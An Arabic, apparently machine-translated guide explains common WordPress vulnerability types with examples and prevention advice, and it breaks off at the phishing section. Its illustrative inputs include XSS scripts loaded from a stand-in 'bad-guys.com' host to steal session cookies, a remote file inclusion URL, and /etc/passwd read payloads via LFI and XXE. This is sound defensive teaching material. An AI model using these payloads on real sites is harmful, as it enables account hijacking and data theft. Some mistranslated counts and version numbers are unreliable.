شرح نقاط الضعف في ووردبريس

لسوء الحظ ، توجد ثغرات أمنية في WordPress. يمكن أن توجد ثغرات أمنية في WordPress في المكونات الإضافية والسمات الخاصة بك وحتى WordPress الأساسية. ونظرًا لأن WordPress يشغل الآن ما يقرب من 40 ٪ من جميع مواقع الويب ، فإن مهمة فهم نقاط الضعف أكثر أهمية. ببساطة: عليك أن تكون يقظًا بشأن أمان موقع الويب الخاص بك.

إذا لم تكن خبيرًا في أمان WordPress ، فقد يكون فهم جميع نقاط الضعف المختلفة في WordPress أمرًا شاقًا. قد يكون من الصعب أيضًا محاولة فهم المستويات المختلفة لشدة الثغرة ، جنبًا إلى جنب مع مخاطر ثغرة WordPress.

سيحدد هذا الدليل 21 نقطة ضعف شائعة في WordPress ، ويغطي كيفية تسجيل مدى خطورة ثغرة WordPress ، ويعطي أمثلة عن كيفية استغلال المتسلل للثغرة الأمنية ، ويوضح كيف يمكن منع هذه الثغرات. دعنا نتعمق.

ما هي ثغرة WordPress؟

الثغرة الأمنية في WordPress هي نقطة ضعف أو عيب في قالب أو مكون إضافي أو نواة WordPress يمكن للمتطفلين استغلالها. بعبارة أخرى ، تُنشئ الثغرات الأمنية في WordPress نقطة دخول يمكن للمتسلل استخدامها للتخلص من أي نشاط ضار.

ضع في اعتبارك أن القرصنة على مواقع الويب تكون آلية بالكامل تقريبًا. لهذا السبب ، يمكن للمتسللين بسهولة اقتحام عدد كبير من مواقع الويب في أي وقت من الأوقات على الإطلاق. يستخدم المتسللون أدوات خاصة تفحص الإنترنت بحثًا عن نقاط الضعف المعروفة.

يحب المتسللون الأهداف السهلة ، وامتلاك موقع ويب يقوم بتشغيل برنامج به نقاط ضعف معروفة يشبه تسليم المتسلل التعليمات خطوة بخطوة لاقتحام موقع WordPress أو الخادم أو الكمبيوتر أو أي جهاز آخر متصل بالإنترنت.

تغطي تقاريرنا الشهرية حول الثغرات الأمنية في WordPress جميع نواة WordPress التي تم الكشف عنها علنًا ومكوِّن WordPress الإضافي وثغرات الثغرات الأمنية. في هذه التقارير ، نشارك اسم المكون الإضافي أو السمة الضعيفة والإصدارات المتأثرة ونوع الثغرة الأمنية.

ما هي ثغرة يوم الصفر؟

عندما يتعلق الأمر بثغرات WordPress ، من المهم فهم تعريف ثغرة يوم الصفر. نظرًا لأنه تم الكشف عن الثغرة الأمنية للجمهور ، فإن المطور لديه صفر أيام لتصحيح الثغرة الأمنية. ويمكن أن يكون لهذا آثار كبيرة على الإضافات والقوالب الخاصة بك.

عادةً ما يكتشف الباحث الأمني ​​ثغرة أمنية ويكشف بشكل خاص عن الثغرة الأمنية لمطوري الشركة الذين يمتلكون البرنامج. يتفق الباحث الأمني ​​والمطور على أنه سيتم نشر التفاصيل الكاملة بمجرد إتاحة التصحيح. قد يكون هناك تأخير طفيف في الكشف عن الثغرة الأمنية بعد إصدار التصحيح لمنح المزيد من الأشخاص الوقت لتحديث الثغرات الأمنية الرئيسية.

ومع ذلك ، إذا لم يستجب المطور للباحث الأمني ​​أو فشل في توفير تصحيح للثغرة الأمنية ، فقد يكشف الباحث علنًا عن الثغرة الأمنية للضغط على المطور لإصدار تصحيح.

قد يبدو الكشف علنًا عن ثغرة أمنية وتقديم يوم الصفر على ما يبدو بنتائج عكسية. لكنها الرافعة الوحيدة التي يجب على الباحث الضغط عليها للضغط على المطور لإصلاح الثغرة الأمنية.

يحتوي Project Zero من Google على إرشادات مماثلة عندما يتعلق الأمر بالكشف عن نقاط الضعف. ينشرون التفاصيل الكاملة للثغرة الأمنية بعد 90 يومًا. ما إذا كان قد تم تصحيح الثغرة الأمنية أم لا.

الضعف موجود ليجده أي شخص. إذا اكتشف المتسلل الثغرة الأمنية قبل أن يقوم المطور بإصدار التصحيح ، فإنه يصبح أسوأ كابوس للمستخدم النهائي .... يوم الصفر المستغل بنشاط.

ما هي ثغرة يوم الصفر المستغلة بشكل نشط؟

ثغرة يوم الصفر المستغلة بشكل نشط هي بالضبط ما تبدو عليه. إنها ثغرة أمنية غير مصححة يستهدفها المتسللون ويهاجمونها ويستغلونها بنشاط.

في نهاية عام 2018 ، كان المتسللون يستغلون بنشاط ثغرة خطيرة في WordPress في المكون الإضافي WP GDPR Compliance. سمح الاستغلال للمستخدمين غير المصرح لهم - المزيد حول هذا في القسم التالي - بتعديل إعدادات تسجيل مستخدم WP وتغيير دور المستخدم الافتراضي الجديد من مشترك إلى مسؤول.

وجد هؤلاء المتسللون هذه الثغرة الأمنية قبل المكوّن الإضافي WP GDPR Compliance والباحثين الأمنيين. لذلك ، كان أي موقع ويب تم تثبيت المكون الإضافي عليه علامة سهلة ومضمونة لمجرمي الإنترنت.

كيف تحمي نفسك من ضعف يوم الصفر

أفضل طريقة لحماية موقع الويب الخاص بك من ثغرة Zero-Day هي إلغاء تنشيط البرنامج وإزالته حتى يتم تصحيح الثغرة الأمنية. لحسن الحظ ، تصرف مطورو البرنامج الإضافي WP GDPR Compliance بسرعة وأصدروا تصحيحًا للثغرة الأمنية في اليوم التالي للإفصاح عنها للجمهور.

تجعل الثغرات الأمنية التي لم يتم إصلاحها موقع الويب الخاص بك هدفًا سهلاً للمتسللين.

مقابل الثغرات الأمنية المصادق عليها في WordPress

هناك نوعان من المصطلحات التي يجب أن تكون على دراية بها عند الحديث عن نقاط ضعف WordPress.

1. غير مصادق - تعني ثغرة WordPress غير المصادق عليها أنه يمكن لأي شخص استغلال الثغرة الأمنية.
2. مصادق - وهو موثق وورد وسائل الضعف فإنه يتطلب المستخدم تسجيل الدخول لاستغلالها.

الثغرة الأمنية التي تتطلب مستخدمًا مصادقًا هي أصعب كثيرًا على المخترق لاستغلالها ، خاصةً إذا كانت تتطلب امتيازات على مستوى المسؤول. وإذا كان المتسلل لديه بالفعل مجموعة من بيانات اعتماد المسؤول ، فلن يحتاج حقًا إلى استغلال ثغرة أمنية لإحداث الفوضى.

هناك تحذير واحد. تتطلب بعض الثغرات الأمنية المصادق عليها فقط قدرات على مستوى المشترك لاستغلالها. إذا كان موقع الويب الخاص بك يسمح لأي شخص بالتسجيل ، فلا يوجد فرق كبير بين هذا والثغرة الأمنية غير المصادق عليها.

شرح 19 نقاط ضعف ووردبريس الشائعة

عندما يتعلق الأمر بنقاط الضعف في WordPress ، فهناك 21 نوعًا شائعًا من الثغرات الأمنية. دعنا نغطي كل نوع من أنواع الثغرات الأمنية في WordPress.

1. تجاوز المصادقة

تسمح الثغرة الأمنية في تجاوز المصادقة للمهاجم بتخطي متطلبات المصادقة وأداء المهام المحجوزة عادة للمستخدمين المصادق عليهم.

المصادقة هي عملية التحقق من هوية المستخدم. يتطلب WordPress من المستخدمين إدخال اسم مستخدم وكلمة مرور للتحقق من هويتهم.

مثال على تجاوز المصادقة

تتحقق التطبيقات من المصادقة بناءً على مجموعة ثابتة من المعلمات. يمكن للمهاجم تعديل هذه المعلمات للوصول إلى صفحات الويب التي تتطلب عادةً المصادقة.

من الأمثلة الأساسية لشيء كهذا معلمة مصادقة في عنوان URL.

 https:/my-website/some-plugint?param=authenticated&param=no

يحتوي عنوان URL أعلاه على معلمة مصادقة بقيمة لا. لذلك عندما نزور هذه الصفحة ، ستظهر لنا رسالة تخبرنا بأننا غير مخولين لعرض المعلومات على هذه الصفحة.

ومع ذلك ، إذا كان فحص المصادقة مشفرًا بشكل سيئ ، يمكن للمهاجم تعديل معلمة المصادقة للوصول إلى الصفحة الخاصة.

 https:/my-website/some-plugint?param=authenticated&param=yes

في هذا المثال ، يمكن للمخترق تغيير قيمة المصادقة في عنوان URL إلى نعم لتجاوز متطلبات المصادقة لعرض الصفحة.

كيفية منع تجاوز المصادقة

يمكنك المساعدة في حماية موقع الويب الخاص بك من ثغرات المصادقة المعطلة باستخدام المصادقة ذات العاملين.

2. ضعف الباب الخلفي

تسمح ثغرة Backdoor لكل من المستخدمين المصرح لهم وغير المصرح لهم بتجاوز إجراءات الأمان العادية والحصول على وصول عالي المستوى إلى جهاز كمبيوتر أو خادم أو موقع ويب أو تطبيق.

مثال مستتر

ينشئ المطور بابًا خلفيًا حتى يتمكنوا من التبديل بسرعة بين الترميز واختبار الكود كمستخدم مسؤول. لسوء الحظ ، ينسى المطور إزالة الباب الخلفي قبل طرح البرنامج للجمهور.

إذا وجد المتسلل الباب الخلفي ، فيمكنه استغلال نقطة الدخول للحصول على وصول المسؤول إلى البرنامج. الآن بعد أن أصبح للمتسلل حق الوصول الإداري ، يمكنه القيام بجميع أنواع الأشياء الضارة مثل حقن برامج ضارة أو سرقة بيانات حساسة.

كيفية منع الباب الخلفي

يمكن اختزال الكثير من الأبواب الخلفية في مشكلة واحدة ، وهي التهيئة الأمنية الخاطئة. يمكن التخفيف من مشكلات التكوين الخاطئ للأمان عن طريق إزالة أي ميزات غير مستخدمة في التعليمات البرمجية ، والحفاظ على تحديث جميع المكتبات ، وجعل رسائل الخطأ أكثر عمومية.

3. PHP Object-Injection قابلية التأثر

تحدث ثغرة PHP Object-Injection مع قيام المستخدم بإرسال إدخال غير معقم (بمعنى عدم إزالة الأحرف غير القانونية) قبل تمريرها إلى وظيفة PHP غير unserialized() .

مثال حقن كائن PHP

فيما يلي مثال واقعي لثغرة PHP Object-Injection في المكون الإضافي Sample Ads Manager WordPress الذي تم الإبلاغ عنه في الأصل بواسطة sumofpwn.

ترجع المشكلة إلى مكالمتين غير آمنتين لإلغاء تسلسل () في ملف الملحقات sam-ajax-loader.php . يتم أخذ الإدخال مباشرة من طلب POST كما هو موضح في الكود أدناه.

 if ( in_array( $action, $allowed_actions ) ) { switch ( $action ) { case 'sam_ajax_load_place': echo json_encode( array( 'success' => false, 'error' => 'Deprecated...' ) ); break; case 'sam_ajax_load_ads': if ( ( isset( $_POST['ads'] ) && is_array( $_POST['ads'] ) ) && isset( $_POST['wc'] ) ) { $clauses = **unserialize( base64_decode( $_POST['wc'] ) )**;

قد تؤدي هذه المشكلة إلى قيام المهاجم بإدخال تعليمات برمجية ضارة وتنفيذها.

كيفية منع حقن كائن PHP

لا تستخدم وظيفة unserialize() مع المدخلات التي يوفرها المستخدم ، واستخدم وظائف JSON بدلاً من ذلك.

4. ثغرة أمنية في البرمجة النصية عبر المواقع

تحدث ثغرة أمنية في XSS أو Cross-Site Scripting عندما يسمح تطبيق ويب للمستخدمين بإضافة تعليمات برمجية مخصصة في مسار URL. يمكن للمهاجم استغلال الثغرة الأمنية لتشغيل تعليمات برمجية ضارة في متصفح الويب الخاص بالضحية ، أو إنشاء إعادة توجيه إلى موقع ويب ضار ، أو خطف جلسة مستخدم.

هناك ثلاثة أنواع رئيسية من XSS ، تنعكس. المخزنة ، والمستندة إلى DOM

5. انعكاس ضعف البرمجة النصية عبر المواقع

تحدث XSS المنعكسة أو البرمجة النصية عبر المواقع المنعكسة عندما يتم إرسال برنامج نصي ضار في طلب العميل - وهو طلب قدمته في المستعرض - إلى خادم وينعكس مرة أخرى بواسطة الخادم ويتم تنفيذه بواسطة المستعرض الخاص بك.

مثال على البرمجة النصية عبر المواقع المنعكسة

لنفترض أن yourfavesite.com يتطلب منك تسجيل الدخول لعرض بعض محتويات موقع الويب. ودعنا نقول أن موقع الويب هذا فشل في ترميز مدخلات المستخدم بشكل صحيح.

يمكن للمهاجم الاستفادة من هذه الثغرة الأمنية عن طريق إنشاء رابط ضار yourfavesite.com مع مستخدمي yourfavesite.com في رسائل البريد الإلكتروني yourfavesite.com الوسائط الاجتماعية.

يستخدم المهاجم أداة تقصير عناوين URL لجعل الرابط الخبيث يبدو غير مهدد yourfavesite.com/cool-stuff للنقر عليه ، yourfavesite.com/cool-stuff . ولكن ، عند النقر فوق الارتباط المختصر ، يتم تنفيذ الارتباط الكامل بواسطة متصفحك yourfavesite.com/cool-stuff?q=cool-stuff<\script&src=”http://bad-guys.com/passwordstealingcode.js .

بعد النقر على الرابط، سوف يتم نقلك إلى yourfavesite.com ، وسوف تنعكس السيناريو الخبيثة إلى المتصفح الخاص بك، مما يسمح للمهاجم اختطاف الكوكيز جلسة العمل الخاصة بك و yourfavesite.com حساب.

كيفية منع انعكاس البرمجة عبر المواقع

القاعدة رقم 5 في ورقة الغش الخاصة بمنع البرمجة النصية عبر OWASP هي تشفير عنوان URL قبل إدخال بيانات غير موثوق بها في قيم معلمات عنوان URL لـ HTML. يمكن أن تساعد هذه القاعدة في منع إنشاء ثغرة XSS انعكاسية عند إضافة بيانات غير موثوق بها إلى قيمة معلمة HTTP GET.

<a href="http://www.yourfavesite.com?test=...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a >

6. ثغرة أمنية في البرمجة النصية عبر المواقع المخزنة

تسمح ثغرة XSS المخزنة أو البرمجة النصية عبر المواقع المخزنة للمتسللين بحقن تعليمات برمجية ضارة وتخزينها على خادم تطبيق الويب.

مثال على البرمجة النصية عبر المواقع المخزنة

يكتشف المهاجم أن yourfavesite.com يسمح للزائرين بتضمين علامات HTML في قسم التعليقات بالموقع. لذلك ينشئ المهاجم تعليقًا جديدًا:

مقال رائع! تحقق من هذه المقالة الرائعة الأخرى <script src=”http://bad-guys.com/passwordstealingcode.js> . </script>

ملاحظة: قد تتطلب ثغرة XSS المنعكسة من الزائر النقر فوق ارتباط التعليمات البرمجية الضارة لتنفيذه. يتطلب هجوم XSS المخزن زيارة الصفحة التي تحتوي على التعليق فقط. تعمل الشفرة الخبيثة مع كل تحميل للصفحة.

الآن بعد أن أضاف الشخص السيئ التعليق ، سيتعرض كل زائر مستقبلي لهذه الصفحة لنصه الضار. يتم استضافة البرنامج النصي على موقع الويب الخاص yourfavesite.com سيء ولديه القدرة على اختطاف ملفات تعريف ارتباط جلسة الزوار وحسابات yourfavesite.com .

كيفية منع البرمجة النصية عبر المواقع المخزنة

القاعدة رقم 1 في ورقة الغش الخاصة بمنع البرمجة النصية عبر OWASP هي ترميز HTML قبل إضافة بيانات غير موثوق بها إلى عناصر HTML.

 <body> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </body>

 <div> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </div>

ترميز الأحرف التالية لمنع التبديل إلى أي سياق تنفيذ ، مثل البرنامج النصي أو النمط أو معالجات الأحداث. يوصى باستخدام كيانات سداسية عشرية في المواصفات.

 & --> &amp; < --> &lt; > --> &gt; " --> &quot; ' --> &#x27;

7. توثيق ثغرة أمنية في البرمجة النصية عبر المواقع المستندة إلى نموذج كائن

تحدث ثغرة أمنية في البرمجة النصية عبر المواقع المستندة إلى DOM أو المستندة إلى نموذج كائن المستند عندما يكتب البرنامج النصي من جانب العميل الخاص بموقع الويب البيانات المقدمة من المستخدم إلى نموذج كائن المستند (DOM). يقوم موقع الويب بعد ذلك بقراءة تاريخ المستخدم من DOM وإخراجها إلى متصفح الويب الخاص بالزائر.

إذا لم يتم التعامل مع البيانات التي يوفرها المستخدم بشكل صحيح ، يمكن للمهاجم إدخال شفرة ضارة سيتم تنفيذها عندما يقرأ موقع الويب الشفرة من DOM.

ملاحظة: تعد XSS المنعكسة والمخزنة مشكلات من جانب الخادم بينما XSS المستندة إلى DOM هي مشكلة عميل (متصفح).

مثال على البرمجة النصية عبر المواقع المستندة إلى نموذج كائن المستند

طريقة شائعة لشرح هجوم DOM XSS على صفحة ترحيب مخصصة. بعد إنشاء حساب ، لنفترض أن yourfavesite.com تمت إعادة توجيهك إلى صفحة ترحيب مخصصة للترحيب بك بالاسم باستخدام الكود أدناه. ويتم ترميز اسم المستخدم في URL.

 <HTML> <TITLE>Welcome!</TITLE> Hi <SCRIPT> var pos=document.URL.indexOf("name=")+8; document.write(document.URL.substring(pos,document.URL.length)); </SCRIPT> <BR> Welcome to yourfavesite.com! … </HTML>

لذلك ، سيكون لدينا عنوان URL الخاص بـ yourfavesite.com/account?name=yourname .

يمكن للمهاجم تنفيذ هجوم XSS قائم على DOM عن طريق إرسال عنوان URL التالي إلى المستخدم الجديد:

 http://yourfavesite.com/account?name=<script>alert(document.cookie)</script>

عندما ينقر المستخدم الجديد على الرابط ، يرسل متصفحه طلبًا لـ:

 /account?name=<script>alert(document.cookie)</script>

إلى bad-guys.com . يستجيب الموقع بالصفحة التي تحتوي على كود جافا سكريبت أعلاه.

يقوم مستعرض المستخدم الجديد بإنشاء كائن DOM للصفحة ، حيث يحتوي الكائن document.location على السلسلة:

 http://www.bad-guys.com/account?name=<script>alert(document.cookie)</script>

لا تتوقع الكود الأصلي في الصفحة أن تحتوي المعلمة الافتراضية على ترميز HTML ، مما يكرر الترميز على الصفحة. ثم سيعرض متصفح المستخدم الجديد الصفحة وينفذ البرنامج النصي للمهاجم:

 alert(document.cookie)

كيفية منع البرمجة النصية عبر المواقع المستندة إلى DOM

القاعدة رقم 1 في ورقة الغش الخاصة بمنع البرمجة النصية عبر المواقع المستندة إلى OWASP Dom هي هروب HTML. بعد ذلك ، هرب JS قبل إضافة بيانات غير موثوق بها إلى نص HTML الفرعي ضمن سياق التنفيذ.

أمثلة على طرق HTML الخطرة:

صفات

 element.innerHTML = "<HTML> Tags and markup"; element.outerHTML = "<HTML> Tags and markup";

أساليب

 document.write("<HTML> Tags and markup"); document.writeln("<HTML> Tags and markup");

لإجراء تحديثات ديناميكية على HTML في DOM الآمن ، توصي OWASP بما يلي:

1. ترميز HTML ، وبعد ذلك
2. ترميز JavaScript لجميع المدخلات غير الموثوق بها ، كما هو موضح في هذه الأمثلة:

 element.innerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"; element.outerHTML = "<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>";

 document.write("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>"); document.writeln("<%=Encoder.encodeForJS(Encoder.encodeForHTML(untrustedData))%>");

8. عبر الموقع طلب التزوير الضعف

تحدث ثغرة CSRF أو Cross-Site Request Forgery عندما يخدع مجرم إلكتروني مستخدمًا للقيام بإجراءات غير مقصودة. يقوم المهاجم بتزوير طلب المستخدم لأحد التطبيقات.

مثال على التزوير عبر الموقع

في تقرير ثغرات WordPress لشهر يناير 2020 ، قمنا بالإبلاغ عن الثغرة الأمنية عبر الموقع طلب التزوير الموجودة في المكون الإضافي Code Snippets. (تم تصحيح المكوّن الإضافي بسرعة في الإصدار 2.14.0)

سمح افتقار المكون الإضافي لحماية CRSF لأي شخص بتزوير طلب نيابة عن مسؤول وحقن رمز قابل للتنفيذ على موقع ضعيف. كان من الممكن أن يستغل المهاجم هذه الثغرة الأمنية لتنفيذ تعليمات برمجية ضارة وحتى إجراء عملية استيلاء كاملة على الموقع.

كيفية منع التزوير عبر الموقع

تحتوي معظم أطر عمل التشفير على دفاعات رمزية متزامنة مدمجة للحماية من CSRF ، ويجب استخدامها.

هناك أيضًا مكونات خارجية مثل CSRF Protector Project التي يمكن استخدامها لحماية ثغرات PHP و Apache CSRF.

9. طلب ​​جانب الخادم لضعف التزوير

تسمح الثغرة الأمنية SSRF أو Server-Site Request Forger للمهاجم بخداع تطبيق من جانب الخادم لتقديم طلبات HTTP إلى مجال عشوائي من اختيارهم.

مثال على تزوير الطلب من جانب الخادم

يمكن استغلال ثغرة أمنية في SSRF لتنفيذ هجوم برمجة عبر الموقع المنعكس. يمكن للمهاجم جلب برنامج نصي ضار من bad-guys.com وتقديمه لجميع زوار موقع الويب.

كيفية منع تزوير الطلب من جانب الخادم

الخطوة الأولى للتخفيف من ثغرات SSRF هي التحقق من صحة المدخلات. على سبيل المثال ، إذا كان الخادم الخاص بك يعتمد على عناوين URL التي يوفرها المستخدم لجلب ملفات مختلفة ، فيجب عليك التحقق من صحة عنوان URL والسماح فقط للمضيفين المستهدفين الذين تثق بهم.

لمزيد من المعلومات حول منع SSRF ، راجع ورقة الغش OWASP.

10. الضعف في تصعيد الامتياز

تسمح ثغرة تصعيد الامتياز للمهاجم بتنفيذ المهام التي تتطلب عادةً امتيازات ذات مستوى أعلى.

مثال على تصعيد الامتياز

في تقرير ثغرات WordPress لشهر نوفمبر 2020 ، أبلغنا عن ثغرة أمنية في تصعيد الامتياز تم العثور عليها في المكون الإضافي Ultimate Member (تم تصحيح الثغرة الأمنية في الإصدار 2.1.12).

يمكن للمهاجم توفير معلمة مصفوفة wp_capabilities تعريف المستخدم wp_capabilities الذي يحدد دور المستخدم. أثناء عملية التسجيل ، تم تمرير تفاصيل التسجيل update_profile وظيفة update_profile ، وسيتم update_profile أي بيانات وصفية تم إرسالها ، بغض النظر عن ما تم إرساله ، لهذا المستخدم المسجل حديثًا.

سمحت الثغرة الأمنية بشكل أساسي للمستخدم الجديد بطلب المسؤول عند التسجيل.

كيفية منع تصعيد الامتياز

يمكن أن يساعد iThemes Security Pro في حماية موقع الويب الخاص بك من التحكم في الوصول المعطل عن طريق تقييد وصول المسؤول إلى قائمة الأجهزة الموثوقة.

11. ثغرة أمنية في تنفيذ التعليمات البرمجية عن بُعد

تسمح الثغرة الأمنية RCE أو Remote Code Execution للمهاجم بالوصول وإجراء تغييرات عليه وحتى الاستيلاء على جهاز كمبيوتر أو خادم.

مثال على تنفيذ التعليمات البرمجية عن بعد

في عام 2018 ، كشفت Microsoft عن ثغرة أمنية في تنفيذ التعليمات البرمجية عن بُعد وجدت في Excel.

يمكن للمهاجم الذي نجح في استغلال الثغرة الأمنية تشغيل تعليمات برمجية عشوائية في سياق المستخدم الحالي. إذا تم تسجيل دخول المستخدم الحالي بحقوق مستخدم إدارية ، يمكن للمهاجم التحكم في النظام المتأثر. يمكن للمهاجم بعد ذلك تثبيت البرامج ؛ عرض البيانات أو تغييرها أو حذفها ؛ أو إنشاء حسابات جديدة مع حقوق المستخدم الكاملة. يمكن أن يكون المستخدمون الذين تم تكوين حساباتهم بحيث يكون لها حقوق مستخدم أقل على النظام أقل تأثرًا من المستخدمين الذين يعملون بحقوق مستخدم إداري.

كيفية منع تنفيذ التعليمات البرمجية عن بعد

أسهل طريقة للتخفيف من ثغرة RCE هي التحقق من صحة إدخال المستخدم عن طريق تصفية وإزالة أي أحرف غير مرغوب فيها.

تحتوي شركتنا الأم Liquid Web ، على مقال رائع حول منع تنفيذ التعليمات البرمجية عن بُعد.

12. ضعف إدراج الملف

تحدث ثغرة تضمين ملف عندما يسمح تطبيق ويب للمستخدم بإرسال مدخلات إلى الملفات أو تحميل الملفات إلى الخادم.

هناك نوعان من الثغرات الأمنية المتعلقة بتضمين الملفات ، المحلية والبعيدة.

13. تضمين الملف المحلي الضعف

تسمح ثغرة LFI أو Local File Inclusion للمهاجم بقراءة الملفات وتنفيذها أحيانًا على خادم موقع الويب.

مثال تضمين الملف المحلي

دعنا نلقي نظرة أخرى على yourfavesite.com ، حيث لا يتم تطهير المسارات التي تم تمريرها include العبارات بشكل صحيح. على سبيل المثال ، دعنا نلقي نظرة على عنوان URL أدناه.

 yourfavesite.com/module.php?file=example.file

يمكن للمهاجم أن يغير معلمة URL للوصول إلى ملف عشوائي على الخادم.

 yourfavesite.com/module.php?file=etc/passwd

قد يسمح تغيير قيمة الملف في عنوان URL للمهاجم بعرض محتويات ملف psswd.

كيفية منع تضمين الملف المحلي

قم بإنشاء قائمة مسموح بها بالملفات التي قد تتضمنها الصفحة ، ثم استخدم معرفًا للوصول إلى الملف المحدد. ثم قم بحظر أي طلب يحتوي على معرف غير صالح.

14. الثغرة الأمنية تضمين الملف البعيد

تسمح الثغرة الأمنية RFI أو Remote File Inclusion للمهاجم بتضمين ملف ، وعادةً ما يستغل آليات "التضمين الديناميكي للملف" المطبقة في التطبيق الهدف.

مثال على تضمين ملف بعيد

تم إغلاق WordPress Plugin WP مع Spritz في مستودع WordPress.org لأنه يحتوي على ثغرة في RFI.

فيما يلي الكود المصدري للثغرة الأمنية:

 if(isset($_GET['url'])){ $content=file_get_contents($_GET['url']);

يمكن استغلال الكود عن طريق تغيير قيمة content.filter.php?url= value. على سبيل المثال:

 yoursite.com//wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://bad-guys.com/exec

منع تضمين الملفات عن بعد

قم بإنشاء قائمة مسموح بها بالملفات التي قد تتضمنها الصفحة ، ثم استخدم معرفًا للوصول إلى الملف المحدد. ثم قم بحظر أي طلب يحتوي على معرف غير صالح.

15. ثغرة أمنية لمسح الدليل

تسمح الثغرة الأمنية لمسح الدليل أو اجتياز الملفات للمهاجم بقراءة ملفات عشوائية على الخادم الذي يقوم بتشغيل أحد التطبيقات.

مثال اجتياز الدليل

كانت إصدارات WordPress 5.7 - 5.03 عرضة لهجمات اجتياز الدليل لأنها فشلت في التحقق من بيانات إدخال المستخدم بشكل صحيح. يمكن للمهاجم الذي لديه حق الوصول إلى حساب يتمتع بامتيازات author على الأقل استغلال الثغرة الأمنية لاجتياز الدليل وتنفيذ كود PHP ضار على الخادم الأساسي ، مما يؤدي إلى استيلاء كامل عن بُعد.

كيفية منع اجتياز الدليل

يمكن للمطورين استخدام الفهارس بدلاً من الأجزاء الفعلية لأسماء الملفات عند عمل قوالب أو استخدام ملفات اللغة.

16. ضعف إعادة التوجيه الخبيث

تسمح ثغرة إعادة التوجيه الضارة للمهاجم بحقن رمز لإعادة توجيه زوار الموقع إلى موقع ويب آخر.

مثال على إعادة التوجيه الضار

لنفترض أنك تبحث عن سترة زرقاء باستخدام أداة البحث في متجر عبر الإنترنت.

لسوء الحظ ، فشل خادم المتجر في تشفير مدخلات المستخدم بشكل صحيح ، وتمكن المهاجم من إدخال برنامج نصي لإعادة التوجيه ضار في استعلام البحث الخاص بك.

لذلك ، عندما تكتب سترة زرقاء في حقل البحث الخاص بالمتجر وتضغط على إدخال ، ينتهي بك الأمر في صفحة الويب الخاصة بالمهاجم بدلاً من صفحة البوتيك بسترات تطابق وصف بحثك.

كيفية منع إعادة التوجيه الضارة

يمكنك الحماية من عمليات إعادة التوجيه الضارة عن طريق تطهير مدخلات المستخدم ، والتحقق من صحة عناوين URL ، والحصول على تأكيد الزائر لجميع عمليات إعادة التوجيه خارج الموقع.

17. ثغرة XML الخارجية للكيان

تسمح الثغرة الأمنية للكيان الخارجي XXE أو XML للمهاجم بخداع محلل XML لتمرير معلومات حساسة إلى كيان خارجي يخضع لسيطرته.

مثال على كيان خارجي لـ XML

يمكن للمهاجم استغلال ثغرة XXE للوصول إلى الملفات الحساسة مثل etc / passwd ، الذي يخزن معلومات حساب المستخدم.

 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>

كيفية منع الكيان الخارجي XML

أفضل طريقة لمنع XXE هي استخدام تنسيقات بيانات أقل تعقيدًا مثل JSON وتجنب تسلسل البيانات الحساسة.

18. هجوم الحرمان من الخدمة

هجوم DoS أو رفض الخدمة هو محاولة متعمدة لجعل موقع الويب أو التطبيق الخاص بك غير متاح للمستخدمين عن طريق إغراقه بحركة مرور الشبكة.

في هجوم رفض الخدمة الموزع DDoS ، يستخدم المهاجم مصادر متعددة لإغراق الشبكة بحركة المرور. سيقوم المهاجم باختطاف مجموعات من أجهزة الكمبيوتر وأجهزة التوجيه وأجهزة إنترنت الأشياء المصابة بالبرامج الضارة لزيادة تدفق حركة المرور.

مثال هجوم رفض الخدمة

تم فرض أكبر هجوم DDoS (رفض الخدمة الموزع) على AWS في فبراير من هذا العام. أفادت أمازون أن AWS Shield ، خدمة الحماية من التهديدات المُدارة الخاصة بها ، لاحظت وتخفيف هجوم DDoS الضخم هذا. استمر الهجوم 3 أيام وبلغ ذروته عند 2.3 تيرابايت في الثانية.

كيفية منع هجوم رفض الخدمة

هناك طريقتان رئيسيتان للتخفيف من هجوم DoS.

1. شراء استضافة أكثر مما تحتاج. يمكن أن يساعدك امتلاك موارد إضافية تحت تصرفك على تجاوز الطلب المتزايد الناجم عن هجوم DoS.
2. استخدم جدار حماية على مستوى الخادم مثل Cloudflare. يمكن لجدار الحماية اكتشاف ارتفاع غير عادي في حركة المرور ومنع تحميل موقع الويب الخاص بك بشكل زائد.

19. تسجيل ضغط المفاتيح

يحدث تسجيل ضغطات المفاتيح ، المعروف أيضًا باسم Keylogging أو التقاط لوحة المفاتيح ، عندما يقوم أحد المتطفلين بمراقبة ضغطات مفاتيح زوار موقع الويب وتسجيلها.

مثال على تسجيل ضغطات المفاتيح

في عام 2017 ، نجح أحد المتسللين في تثبيت JavaScript ضار على خادم صانع الهواتف الذكية OnePlus.

باستخدام الشفرة الخبيثة ، قام المهاجمون بمراقبة ضغطات مفاتيح عملاء OnePlus وتسجيلها أثناء قيامهم بإدخال تفاصيل بطاقة الائتمان الخاصة بهم. قام المتسللون بتسجيل وجمع ضغطات المفاتيح لـ 40.000 عميل قبل أن يكتشف OnePlus الاختراق ويصلحه.

كيفية منع تسجيل ضغطات المفاتيح

تحديث كل شيء! عادة ، سيحتاج المهاجم إلى استغلال ثغرة أمنية موجودة أخرى لإدخال برنامج تسجيل لوحة مفاتيح على جهاز كمبيوتر أو خادم. سيؤدي الحفاظ على كل شيء محدثًا بأحدث تصحيحات الأمان إلى منع إعطاء المتسللين طريقة سهلة لتثبيت برنامج keylogger على موقع الويب الخاص بك أو جهاز الكمبيوتر الخاص بك.

المكافأة: 2 الهندسة الاجتماعية ونقاط ضعف المستخدم

الثغرات الأمنية في البرامج هي الشيء الوحيد الذي يحاول المتسللون ومجرمو الإنترنت استغلاله. القراصنة أيضا يستهدفون ويستغلون البشر. دعونا نلقي نظرة على طريقتين يمكن أن نتحول فيهما إلى نقاط ضعف.

1. التصيد

